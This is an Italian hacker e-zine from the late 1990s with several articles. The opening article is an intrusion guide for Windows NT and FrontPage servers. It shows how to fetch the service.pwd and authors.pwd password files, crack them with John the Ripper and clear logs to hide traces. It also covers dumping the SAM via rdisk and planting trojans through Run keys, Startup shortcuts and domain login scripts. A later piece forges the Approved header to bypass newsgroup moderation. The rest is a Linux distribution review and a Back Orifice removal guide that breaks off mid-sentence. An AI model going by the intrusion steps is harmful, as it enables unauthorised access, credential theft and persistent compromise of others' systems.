Volonta' & Esta THE alla PESCA ! MUSICA ASCOLTATA: 883 (La donna il Sogno e il grande Incubo) FILM GUARDATO: Delitti inquietanti su T+/G .. Con Seagal ORE DEL GIORNO: 11.46 STATO: Alquanto incaxxato, e' arrivata la bolletta... :( LADRIIIIIII Ok ora cominciamo con l'esempio Aprire FrontPage Explorer e cliccare su File, Apri FrontPage WEB, al BOX che si presenta selezionare Apri WEB esistente, e scegliere il web da aprire... Ah clikka su MORE WEB se il nostro target non compare.... poi clikkiamo OK... Se ci viene richiesto il nome dell'autore e la sua password allora dovremo crakkare il file service.pwd oppure rimuoverlo (seeeee!). Ora una volta accettati i parametri.. o gli cambi le pagine direttamente online.. oppure le scarichi le modifichi e le UPLOADI !!! Come si preferisce.... tanto il sys e' coglioNe ! Scanning PORT 80 (http) or 443 (https) options: GET /_vti_inf.html GET /_vti_pvt/service.pwd servers :( GET /_vti_pvt/authors.pwd encrypted GET /_vti_pvt/administrators.pwd GET /_vti_log/author.log perche' ci sono # Ahaha le password criptate ! Okkio che non e' usato su IIS and WebSite #Su Netscape servers solo. Nome e password degli autori ! #Se c'e' sto file.. consiglio di pulirlo.. le tue tracce.. azz ! GET /samples/search/queryhit.htm Mah io proverei anche a fare un FTP al server per vedere se mi scarica il service.pwd.... Attempt to connect to the server using FTP. port 21 login anonymous password guest@unknown the anonymous login will use the internally created IISUSR_computername account to assign NT permissions. An incorrect configuration may leave areas vulnerable to attack. Se abbiamo il file .pwd.. qui.. apparirebbe + o - cosi': Vacuum:SGXJVl6OJ9zkE Mmmmm sembra il formato DES... anzi mi sa che e' proprio quello... non mi piace cosi' quell'account lo voglio vedere come se fosse un UNIX... quindi lo modifico .... Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash Hihih oh i numeri dopo la pass.. sono a caso.. e' solo per mettere il formatino DES !!! Salviamolo in un file.. e mandiamo a lavoro l'amico John... sperando che decripti qualche cosa... e cmq e' molto probabile che si usino password come nomi e cose del genere !!! Non ci crederete ma ho trovato + bug (vecchi di miglioni di bit!) in italia che in altri paesi.. figuriamoci se non ci si diverte con ste cose... mah W l'italia.... solo la BOXING non se po' fa' !! Mah e' da vedere... ci so ste cose... TELEKOZ.. avra' altri errori ..... ================================================================================ ================= III. Vulnerabilita' nel registro di (s)configurazione ! Veloce veloce ecco un piccolo BUG (che non conoscevo ma che mi hanno gentilmente spiegato !!) nel registro di WINZOZ. E' sempre il solito e' vecchio CORE DUMP.. ma alla Microsoft... ora cerchero' di spiegarlo in modo semplice.... RDISK con l'opzione /S eseguito sul sistema... copiera' una parte del registro di configurazione o meglio la parte delle password.. in :\winnt\repair directory... Ma non e' tutto... questa opzione ci permettera' di creare un disco di ripristino di emergenza .. qui c'e' uno .zip che contiene un programma, il SAMDUMP.EXE, che permette di estrarre le password dal disketto di ripristino di emergenza ! Quindi.. in quella direttori ci sara' un sam._ file... Questo file e' ETICAMENTE (ma dai... ) usato per il ripristino di emergenza delle password, cosi' se abbiamo accesso alla nostra macchina preferita possiamo eseguire rdisk/s .. nello .zip c'e' il programma SAMDUMP.EXE per estrarre le password... quindi.. abbiamo tutto.... Sinceramente non lo ho mai provato.. quindi non so se funziona.. cmq provare non fa male ! ---- AT ---Ecco un altro trucchetto che si puo' fare solo in locale pero' !! Meglio di niente ! NOTES about AT.EXE usage: AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]] AT [\\computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...]] "command" \\computername Specifies a remote computer. Commands are scheduled on the id /delete /yes time /interactive /every:date[,...] /next:date[,...] "command" local computer if this parameter is omitted. Is an identification number assigned to a scheduled command. Cancels a scheduled command. If id is omitted, all the scheduled commands on the computer are canceled. Used with cancel all jobs command when no further confirmation is desired. Specifies the time when command is to run. Allows the job to interact with the desktop of the user who is logged on at the time the job runs. Runs the command on each specified day(s) of the week or month. If date is omitted, the current day of the month is assumed. Runs the specified command on the next occurrence of the day (for example, next Thursday). If date is omitted, the current day of the month is assumed. Is the Windows NT command, or batch program to be run. La traduzione e' ovvia... ho fatto un paste dal prompt ! Cmq dal prompt della macchina NT possiamo digitare: at <time> /interactive "regedt32.exe" Added a new job with job ID = 0 # viene mostrato questo se ha funzionato ! Faccio riferimento # alla versione inglese di NT The service has not been started. #bhe non ha funzionato ! Avviando il registro ... avremo accesso a tutto il sistema NT.. e' chiaro che per fare tutte le modifiche al nostro bene amato registro dovremo avere i privilegi di super utente e quel che e' peggio dovremo essere su una macchina locale ! L'accesso base al registro di configurazione non permette di vedere le password e cmq possiamo accedere allo stesso tramite WIN32 API RegConnectRegistry() HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ SecurePipeServers\ Winreg Se non ci sono ste chiavi allora l'accesso remoto al registro non e' ristretto ! Questo e' quello che ci piace.. perche' se volessimo modificare il registro da remoto dovremo sfruttare il programma REGEDT32.EXE..... naturalmente e' necessario avere i privilegi per la modifica e/o la lettura delle chiavi del registro di configurazione. !! Ecco come fare (avendo i privilegi !): Avviamo REGEDT32.EXE 1. Sul menu FILE clikka su CONNECT 2. Inseriamo il nome del COMPUTER REMOTO ! 3. Nell' "Users on Remote Computer dialog box", clikka l'user che e' loggato nella macchina ! Solitamente e' l'unico loggato !!! 4. Doppio-click su Local User per cambiare HKEY_CURRENT_USER Registry settings. 5. Doppio-click su Local Computer per cambiare HKEY_LOCAL_MACHINE Registry settings. 6. Ora su FILE, clikka SAVE. 7. Poi File menu, click Disconnect. E' sempre chiaro che per accedere bisogna avere i permessi ! E poi di default si ha accesso a solo le due chiavi HKEY_CURRENT_USER e HKEY_CURRENT_USER. Quindi per modificare il registro da remoto tramite la linea di comando si puo' usare un programma come REGINI.EXE usage: REGINI [-h hivefile hiveroot | -w Win95 Directory | -m \\machinename] [-i n] [-o outputWidth] [-c] codepage [-b] textFiles... where: -h specifies a specify local hive to manipulate. -w specifies the paths to a Windows 95 system.dat and user.dat files -m specifies a remote Windows NT machine whose registry is to be manipulated. -i n specifies the display indentation multiple. Default is 4 -o outputWidth specifies how wide the output is to be. -c specifies codepage of textFiles, if they are ANSI textFiles. -b specifies that REGINI should be backward compatible with older versions of REGINI that did not strictly enforce line continuations and quoted strings Specifically, REG_BINARY, REG_RESOURCE_LIST and REG_RESOURCE_REQUIREMENTS_LIST data types did not need line continuations after the first number that gave the size of the data. It just kept looking on following lines until it found enough data values to equal the data length or hit invalid input. Quoted strings were only allowed in REG_MULTI_SZ. They could not be specified around key or value names, or around values for REG_SZ or REG_EXPAND_SZ Finally, the old REGINI did not support the semicolon as an end of line comment character. Tutto questo e' preso da un manuale per il REGINI.. quindi non lo ho scritto di mio pugno ! Idem per il seguente su REGDMP.EXE usage: REGDMP [-m \\machinename | -h hivefile hiveroot | -w Win95 Directory] [-i n] [-o outputWidth] [-s] [-o outputWidth] registryPath where: -m ted. -h -w -i -o specifies a remote Windows NT machine whose registry is to be manipula specifies a specify local hive to manipulate. specifies the paths to a Windows 95 system.dat and user.dat files n specifies the display indentation multiple. Default is 4 outputWidth specifies how wide the output is to be. By default the outputWidth is set to the width of the console window if standard output has not been redirected to a file. In the latter case, an outputWidth of 240 is used. -s specifies summary output. Value names, type and first line of data --- USIAMO REGEDIT PER FARE COSE CHE IL SYS NON SA ! --Nota: Regedit esporta le chiavi del registro in un file chiamato .reg, il contenuto di questi file puo' automaticamente modificare il registro stesso.. ed e' simile al textfile usato con REGINI ! Per capire meglio.. usiamo un esempio, faciamo partire notepad.exe all'avvio (e' chiaro che potremo sostituire qualsiasi file binario !) -- inizia a tagliare da qui -REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "TMS"="notepad.exe" -- finisci qui -Quindi possiamo inserire nel registro qualunque cosa noi si voglia... Bhe se vi siete stupiti di come possa essere scarna questa sezione.. basti pensare che e' solo l'introduzione alla parte dei TROJAN per WINDOWS NT. Quando si ha accesso ad un sistema, in questo caso WINDOWS NT, la cosa piu' importante oltre all'accesso e all'occultamento delle tracce.. e' quello di MANTENERLO IL + A LUNGO POSSIBILE. Come per UNIX, esistono tecniche di trojanizzazione sfruttando proprio dei servizi offerti dal sistema operativo. Prendiamo confidenza con il comando START.... C:\WINDOWS>start Esegue una applicazione Windows o MS-DOS. START [opzioni] programma [arg...] START [opzioni] documento.ext /m[inimized] /max[imized] /r[estored] /w[ait] Esegue la nuova applicazione minimizzata (in background). Esegue la nuova applicazione massimizzata. Ripristina la nuova applicazione (modalita' predefinita). Aspetta che l'altra applicazione esca prima di ritornare. Ora possiamo dire che per eseguire un file .exe .com. .bat o .cmd C:\WINDOWS\COMMAND\START.EXE /m command.com /c trojan.bat (un esempio) Se volessimo inserire una particolare riga nel registro di configurazione... allora: C:\WINDOWS\COMMAND\START.EXE /m command.com /c trojan.reg Ora questo collegamento puo' essere diffuso attraverso il dominio di NT tramite i PROFILI ! ================================================================================ ================= IV. Figli di Troia: .lnk (collegamento, shortcuts) Sappiamo che i file .lnk sono dei collegamenti a dei file.. quindi possiamo aggiungerne qualcuno come avvio ..... C:\WINNT\Profiles\Default User\Start Menu\Programs\Startup, possiamo metterne proprio uno qui ! oppure C:\WINNT\Profiles\userid of exiting user\Start Menu\Programs\Startup .. Il primo avviera' il nostro link... quando l'utente di default (GUEST) si loggera'.. mentre il secondo avviera' il nostro link quando uno specifico utente loggera' nel sistema ! Ma se per esempio abbiamo i profiles attivati .. allora il nostro bel link seguira' l'user da macchina a macchina...... Infatti se noi mettiamo il link nella direttori winnt\profiles\userid, automaticamente si copiano in tutte le macchine nelle quali l'amicone si collega ! Ma se per caso non si riuscisse a copiare il nostro link trojano.. nella direttori profiles.. non disperiamo, possiamo sempre cambiare qualche scriptino di login. C:\WINNT\SYSTEM32\REPL\IMPORT\SCRIPTS qui c'e' lo script di login (.CMD) .. quindi se noi mettiamo le nostre manacce su questo file e diciamo li mettessimo qualche comandino esterno... tutti coloro che si loggano farebbero eseguire alla macchina le nostre istruzioni. C:\WINNT\PROFILES and C:\WINNT\SYSTEM32\REPL\IMPORT\SCRIPTS Administrators Everyone System Full Control Read Full Control Questo ci mostra i permessi standard degli export (NTFS)... Noi possiamo sostituire i comandi normali con dei trojan... proprio come per UNIX.. mettere backdoors.. fare tutto quello che si fa con UNIX... Siamo giunti alla fine di questo viaggio all'interno di WINDOWS NT, spero che il tutto sia stato convincente.. chiaro e soprattutto abbia fatto meditare sulle potenzialita' e sui grandi problemi di sicurezza che affligono il mondo delle TELECOMUNICAZIONI. Nessun Sistema e' al sicuro, nessun sistema e' inviolabile. Meditate gente, meditate. ================================================================================ ================= V. VARIE ED EVENTUALI ! Se vi dicessi che sto guardando un demenziale film come "Mars Attak" puo' essere qualcosa ??? Sono le 15.51 e ho chiuso ! Alla prossima ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ CARATTERISTICHE DISTRIBUZIONI LINUX ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ °°±±²² ±± °°± °° ²² ±± °° ²² ° ± ° ±± ² ±± °°±±²² ° ² ° ² ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Linux: Caratteristiche di ogni distribuzione ============================================ 1 1.1 1.2 2 2.1 2.2 2.3 2.4 2.5 3 4 Il dilemma della distribuzione Dove le trovo? La nostalgia di Win Distribuzioni principali Red Hat Slackware S.U.S.E. Debian Caldera L'ho scelta! (Era ora) Stop 1 Il dilemma della distribuzione Ogni giorno esce una nuova distribuzione e le persone che stanno per optare verso Linux rimangono indecise su quale scegliere. In questo piccolo articolo vi consigliero', anzi, vi faro' capire quale distribuzione si avvicina di piu' alle vostre necessita'. Aspite, sto facendo un articolo che non ha nulla a che vedere con l'hacking, che bello! Dicevo che ogni distr. si distingue da un'altra per dei piccoli particolari: vi e' quella piu' facile, quella piu' configurabile, quella Free e quella commerciale. In poche parole una per ogni esigenza! 1.1 Dove le trovo? Ormai Linux si puo' trovare dappertutto: sulle riviste, nei negozi, dal vostro pirata di 'fiducia', con i libri, via ftp ecc. Ora chi di voi e' in grado di scaricarselo via ftp lo faccia, altrimenti potrete anche comprarvi una rivista tipo: Inter.net, Pc Magazine, Pc Action, Internet Magazine, che ogni tanto allegano delle distribuzioni assieme al giornale. Per esempio su Inter.net di Febbraio si puo' trovare la SUSE 6.0 che, anche se non e' completa, come kernel ha il 2.0.36, una versione stabile e che supporta molte periferiche. Questa non e' pubblicita', e se lo e' non me ne fotte proprio, ma un consiglio su quali giornali comprare. Poi se avete deciso di comprare Linux in versione completa, fatelo! L'importante e' che abbiate parecchi soldini da parte! (scherzo!). Ecco il prezzo di ogni distribuzione: Red Hat Linux 5.2 Caldera Open Linux 1.3 S.u.S.E. Linux 5.3 Slackware 3.5 UnixWare 7 Debian œ 156.000 œ 150.000 œ 109.900 œ 41.000 œ 29.900 FREE Volete anche i siti? OK! www.redhat.com www.caldera.com www.suse.com www.cdrom.com www.sco.com www.debian.org 1.3 La nostalgia di Win Appena installerete il Linux vi manchera' qualcosa. Nel senso che Linux non ha tutte quelle comodita' che ha Windows. All'inizio vi troverete un po' disorientati ma dopo che avrete acquisito della pratica vi sembrera' di sognare, un po' come il ladro che da molto tempo cerca di studiare un piano per fuggire dal carcere ed alla fine gli arrivano per sbaglio le chiavi in mano. Cosi' voi, che da molto tempo nascondavate la vostra curiosita' sotto winzozz, con Linux in mano avrete libero sfogo. Niente crash, niente schermate blu, niente plug and Play (ancora per poco), niente nuke(intendo alla porta 139) e soprattutto niente domandine sarcastiche! 2 Distribuzioni principali Come ho gia' detto Linux si divide in distribuzioni e non in versioni. Questo perche' in realta' il kernel e' sempre lo stesso e solo le personalizzazioni, sia da parte nostra che dalla casa distr., fanno si che una distribuzione si differenzia dalle altre. Qui di seguito trattero' le maggiori distribuzioni in circolazione, ovvero la S.u.S.E., la Red Hat, la Slackware, la Debian e la Caldera. 2.1 Red Hat La Red Hat e' stata la prima distribuzione ad avere un installazione semplificata e dedicata agli utenti alle prime armi. La vera differenza e' stata ottenuta a partire dalla versione 5.0, con l'implemento delle glibc o libc 6. Poi quelli della Red Hat si son resi conto che era molto bacata e hanno fatto uscire dapprima la 5.1, poi la 5.2 che puo' vantare di avere il kernel 2.0.36. Tra breve uscira' anche la 6.0 nella quale verra' implementato il kernel 2.0, atteso da molto tempo. L'installazione e' molto semplice da effettuare, grazie soprattutto alla versatilita' dei pacchetti in formato .rpm. Cio' non permette solo di sapere quali sono i pacchetti installati, ma anche quelli che ci mancano e che devono venire installati. Anche l'aggiornamento dal sito ftp.redhat.com e' facile da fare. Ma la facilita' d'uso non si ferma all'installazione: una volta riavviato il sistema la Red Hat fara' pochissime domande e sara' gia' configurata, anche il windows manager. Al contrario dei vari winzozz, durante l'installazione e' possibile gia' installare software a corredo dei loro sorgenti. Abbiamo a disposizione molte librerie di sviluppo quali: C, C++, Fortran, Pascal, Basic, Java ed altro. La differenza tra la versione free e quella commerciale e' che in quella commerciale vi e' presente del software proprietario. In alcuni casi la Red Hat e' anche troppo semplice! Configurare un server non e' una cosa tanto facile ed il software della RedHat vuole renderla una cosa semplice; alla fine non e' che avremmo fatto un granche' visto che la maggior parte dei file sono gia' configurati. Insomma la Red Hat e' una delle distribuzioni piu' semplici da installare ma con cio' richiede almeno un minimo di conoscenza di Unix. 2.2 Slackware Eccola qui! La distribuzione piu' amata dagli hackers! Il perche' di cio? semplice perche' permette di configurare quasi tutto ed e' molto smanettabile. L'ultima versione dovrebbe essere la 3.5. Purtroppo e' ancora basata sulla vecchia libc 5, ma nella prossima versione ci dovrebbe essere il salto alle glibc. L'installazione avviene tramite pacchetti tgz (tar.gz) che si possono scompattare sia con il classico tar, sia con pkgtool. Il kernel di questa distr. e' il 2.0.34, non e' che sia recente ma abbastanza stabile per metterlo su un server. Questa distr. e' anche molto sicura visto che usa le password shadowed. Se chi sta leggendo e' un hacker non sara' contento di cio', mentre se chi sta leggendo e' un amministratore di sistema optera' verso la Slackware. Il window manager avviato per default e' Fvwm 2 ma e' possibile anche cambiarlo. Tra i programmi gia' installati vi troviamo Netscaper Communicator 4.05 ed il file manager avanzato Tkdesk. L'installazione e' abbastanza semplificata rispetto alle altre ma richiede almeno un minimo di conoscenza: e' facile perche' si puo' installare anche senza ripartizionare l'hard disk, ed e' possibile creare un file di swap piuttosto che una partizione. E' anche possibile scegliere l'installazione expert, se vogliamo decidere noi cio' che dovra' installare o non. Per iniziare, come per quasi tutte le distr., si dovranno creare due dischetti: uno di boot e uno di root. Il primo conterra' tutte le informazioni riguardo ai vari controller, mentre il secondo conterra' un'immagine compressa di tutte le applicazioni relative al setup. Purtroppo tutto il processo d'installazione e' in inglese, ma ormai e' diventata quasi la nostra lingua (in ambito informatico). Questa distr. e' personalizzabile e una volta installata, se il kernel precompilato non vi garba, potrete ricompilare il kernel seguendo le vostre esigenze (per la ricompilazione del kernel andatevi a leggere l'articolo di ZeroCool sullo scorso numero ^_^ ) Insomma questa e' la distr. piu' indicata per smanettoni, hacker e ,perche' no, sysadmin, e non e' consigliata per le persone che non hanno almeno un po d'esperienza col linux. 2.3 S.u.S.E. Eccola! La mia distr. preferita! Sara' per la sua facilita'? Per il gestore grafico? Perche' in alcune parti e' localizzata in Italiano? Si, puo' darsi! Ok, ho esagerato... ora torno in me! MMMAAAAAA QQQQUUUUAAAANNNNTTTTT' E'E'E'E'' BBEEELLLLAAAA SSSTTTTTAAAAA DDDIIIISTRRRR...!!!! Ehm dicevo che questa distribuzione e' davvero ben fatta. Da poco e' uscita la 6.0 ed ha come kernel il 2.0.36, che e' l'ultimo kernel di Linus Torwalds ed e' lo stesso della RedHat 5.2 Contiene oltre 850 pacchetti software su 5 cdrom, ed ha anche una guida in Italiano! I punti forti di questa distr. sono gli strumenti di configurazione: lo Yast e il saX Yast sta per Yet Another Setup Tools ed e' il sistema piu' semplice per l'installazione e per l'amministrazione del sistema. SaX invece sta per Suse advanced X-configuration ed e' un prog che permette di configurare il window manager in modo rapido, intuitivo e efficace, perche' alcune periferiche le trova da solo. Il window manager di default e' l'Fvwm 2 ma e' possibile cambiarlo e mettere il KDE 1.0 ! Siccome la S.u.S.E. e' una distribuzione tedesca la lingua di default del gestore grafico e' il tedesco, ma passando al KDE e' possibile cambiare lingua addirittura in Italiano. I pacchetti della S.u.S.E. sono nello stesso formato della Red Hat e cioe' RPM Chi ha schede video recenti puo' andare direttamente sul sito della S.u.S.E. per scaricarsi gli X-Server, cioe' i server grafici piu' adatti alla vostra scheda grafica, che ogni tanto rilascia. L'aggiornamento e' effettuabile attraverso Yast che sicollega direttamente via ftp. Non c'e' nient'altro da aggiungere e per la maggior parte e' una distr. analoga alla RedHat. In sostanza, si tratta di un ottima distribuzione con cui anche l'utente meno esperto puo' configurare il proprio sistema per l'utilizzo di Linux 2.4 Debian A differenza degli altri prodotti commerciali, la Debian e' una distribuzione free. Ovvero alle spalle non ha una azienda, ma solo molti volontari sparsi per la rete e finche' esiste, nel mondo di Linux non esistera' un monopolio. La distribuzione e' basata su pacchetti proprietari, i file sono .deb L'installazione di Debian non comporta troppe difficolta' ma richiede un minimo di conoscenze in piu' rispetto alle altre distribuzioni. I file deb incorporano al loro interno, oltre che i file di installazione e i vari script, anche una procedura di configurazione del software che viene eseguita proprio in fase di installazione. Dunque prima di installare questa distribuzione e' meglio conoscere a fondo il proprio hardware. L'installazione avviene attraverso il programma Dselect (dpkg) che utilizza la riga di comando per installare, aggiornare o rimuovere i pacchetti. La distribuzione include oltre 1500 pacchetti software, con prog gia' pronti all'uso. Uno dei punti forti di questa distr. e' la documentazione! Infatti il team degli sviluppatori di Debian ha redatto molta documentazione, reperibile sul sito della Debian. Ma e' anche possibile avere documentazione in Italiano, basta andare al sito www.pluto.linux.it/ildp che e' il sito della Italian Linux Documentation Project. La verzione di questa distr. attualmente disponibile e' la 2.0-r4 ed ha il kernel 2.0.34, con nome in codice hamm. Una volta finito un aggiornamento o un'installazione, Dselect si occupera' anche di cancellare i vecchi file. In confronto alle altre distribuzioni, la Debian richiede un minimo di conoscenza in piu' ma ormai quasi tutte le distribuzioni richiedono delle conoscenze in ambito di Linux e hardware 2.5 Caldera OpenLinux Questa distribuzione e' datta alle persone che vorranno Linux corredato di molti programmi commerciali che in altre distribuzioni mancano. L'installazione risulta molto semplice e prevede il supporto per la lingua italiana. Per l'installazione abbiamo Lisa che sta per OpenLinux Installation & Setup Admin e viene eseguita dopo che il kernel ha riconosciuto l'hardware. Lisa server anche per effettuare ulteriori configurazioni e per gestire i moduli e vari demoni del sistema. Attualmente la versione piu' nuova e' la 1.3 ed e' un notevole passo avanti rispetto alle versioni precedenti ed usa il package RPM. Lo spazio occupato da questa distr. puo' variare da qualche centinaio di Mbyte fino a quasi un Gbyte. Una volta finita l'installazione si dovra' formare un utente diverso da root e si procede all'installazione di Lilo, che, al momento del riavvio del sistema, permettera' di scegliere tra i vari sistemi operativi. L'originalita' di questa distr. sta nell'avere un windows manager proprietario. Tra i programmi a disposizione vi sono Netscape Communicator, personalizzato con il logo di Caldera, Apache1.3.1, il famoso prog per mettere su un server, StarOffice 4.0 e Gimp. L'interfaccia del gestore grafico e' molto rinnovata rispetto alle altre e le applicazioni sono un must tra il kde, l'afterstep ed altri windows manager. Il punto di forza della Caldera sono la semplicita' con cui le singole sezioni sono curate, il grande supporto tecnico e la presenza di pacchetti software che non troveremo in altre distribuzioni. 3 L'ho scelta! (era ora) Se siete giunti fino a qui nella lettura significa che in voi c'e' un particolare interesse verso Linux ed ormai avrete le idee chiare sulla distribuzione che piu' si adatta a voi No? Se non le avete (le idee chiare) vi riporto una breve descrizione delle distribuzioni: RedHat --- Semplicita' d'uso, ambiente di sviluppo Slackware --- Possibilita' di personalizzazione e adatta a persone che prediligono il buon vecchio editor per la configurazione S.u.S.E. --- Semplicita' d'uso, localizzata in Italiano, installazione e configurazione piu' semplici Debian --- Free, documentazione esaustiva e file di installazione in formato deb Caldera --- Ricca di programmi, windows manager proprietario Certo che a riassumere in poche righe una distribuzione e' un'impresa ma in questo modo non avrete da decidere! Per qualsiasi problema o indecisione potrete contattarmi via e-mail. Ci vediamo, e mi raccomando passate a Linux che e' meglio! T0rment0 [email protected] http://come.to/hackernovello ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ METTERE L'APPROVED CON AGENT ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ -----------------< fritz presents.... >----------------:mettere l'approved con Agent Allora, come succede per alt.hackers, o succedeva per qualche giorno con alt.hackers.cough.cough.cough, capita ogni tanto di trovare un newsgroup "moderato" nel senso che accetta solo messaggi che tra i vari header abbiano anche il campo Approved: una_email@caso. Con Agent si puo' tranquillamente fare, nessun problema. Come si fa? Be'... leggetevi l'articolo :-) Piccola premessina: questo metodo l'ho trovato io, e naturalmente non al primo colpo ma dopo qualche prova. Raggiunto lo scopo di postare su un NG moderato, ho cercato di capire per quale dei piccoli esperimenti e' successo, solo che dato che ne avevo fatti un po', non mi sono ricordato di tutti eheheh... sono sempre stato un casinista :-) Credo comunque che sia riuscito per il metodo che ora vi spiego, anche perche' quando l'ho postato sul NG nessuno mi ha contraddetto. In ogni caso se non funziona e siete sicuri di aver eseguito alla lettere le istruzioni nella loro banalita', be'... la mia mail o la sapete o la trovate su alt.hackers.cough.cough.cough. E' semplicissimo, bisogna aprire il file agent.ini e cercare la voce ShowAllFields=0 e sostituire il valore 1, per farla diventare: ShowAllFields=1 Ora, ogni volta che si legge un post si vedono tutti gli header, e questo puo' rompere i maroni, ok, basta premere il tasto "h" e gli header spariscono. Quando allora si scrive un messaggio, si vede un bel po' di campi dove si possono modificare gli header... ecco, cercate il field approved (dovrebbe essere il primo) e piu' sotto nel box "value for approved" mettete un indirizzo mail qualsiasi, nella forma [email protected], .com, .org, .net, .sk, .cazz ecc ecc ok, ora il vostro post puo' andare ovunque :) anche sui server cazzuti che fanno i capricci. Per Outlook invece non so qual e' la procedura, non c'e' l'ho, non voglio averlo, e quindi non ho provato, ma so cmq che si puo' fare. Come ho fatto a scoprirlo? ok, lo so, era una cazzata, pero' dai...fatemi sguazzare nell'orgoglio :-) cmq, l'ho scoperto semplicemente cercando nell'help la parola "approve", dato che sapevo che ci voleva una certa "approvazione" e che la poteva mettere direttamente il newsreader, e il file .hlp mi ha rimandato ad una pagina dove spiega come configurare il file agent.ini, copia & incolla in word, ho cercato la parola "approve" e ho trovato: >ShowAllFields=0 >;When non-zero, Agent will allow editing of the Control and Approved >;message fields ok, allora ho detto: uhmmm....proviamo ad impostarlo ad 1 ... :-) tutto qui... sperimentate gente, sperimentate! fritz ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ COME TOGLIERE I TROJAN ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +Copyright ¸ 1999 By LOPKS "Nemo me impune lacessit" http://come.to/lopks +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +- +(ATTENZIONE QUESTE TECNICHE SONO DA ADOTTARE SOLO NEL CASO IN CUI SIATE ASSOLUTAMENTE SICURI DI ESSERE INFETTATI DA UNO DEI SEGUENTI TROJAN HORSES E TUTTI I PROGRAMMI DI "DISINFESTAZIONE" SCARICABILI DAL MIO SITO http://come.to/lopks SIANO FALLITI ) Back Orifice V. 1.20 By Cult of the Dead Cow Il file che il Back Orfice usa di default come server e' : " .exe" (spazio.exe) (122 KB) ma puo' essere rinominato e s'installa nella cartella c:\Windows\System. Il file non installato, non ha icona, mentre dopo aver infettato un computer puo' avere qualsiasi nome, estensione ed icona poiche' grazie al file boconfig.exe (che si trova nel "pacchetto" fornito dalla Cult of the Dead Cow) e' possibile cambiare tutte le opzioni di default. Se per esempio il server non e' stato configurato (caso piu' frequente) allora in Windows\regedit.exe la riga che lo fara' eseguire ad ogni avvio del computer sara': (Predefinito) " .exe" nella cartella : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices percio' basta eliminare questa riga , riavviare il computer e cancellare il file " .exe"(spazio.exe) da c:\Windows\system. Se invece il server e' stato configurato, nel Windows\regedit.exe la riga che fara' eseguire il server ad ogni avvio del computer sara' sempre in : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices ma potra' assumere qualsiasi valore . Ecco un esempio: Windows\regedit.exe [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices] .................................................................... (Predefinito) "valore non impostato" LoadPowerProfile "Rundll32.exe powrprof.dll,LoadCurrentPwrScheme" Pach_lib "lopks.spy" SchedulingAgent "C:\WINDOWS\SYSTEM\mstask.exe" .................................................................... (Naturalmente la maggior parte delle voci potrebbero cambiare) in questo caso salta subito al nostro occhio (almeno spero) il valore: 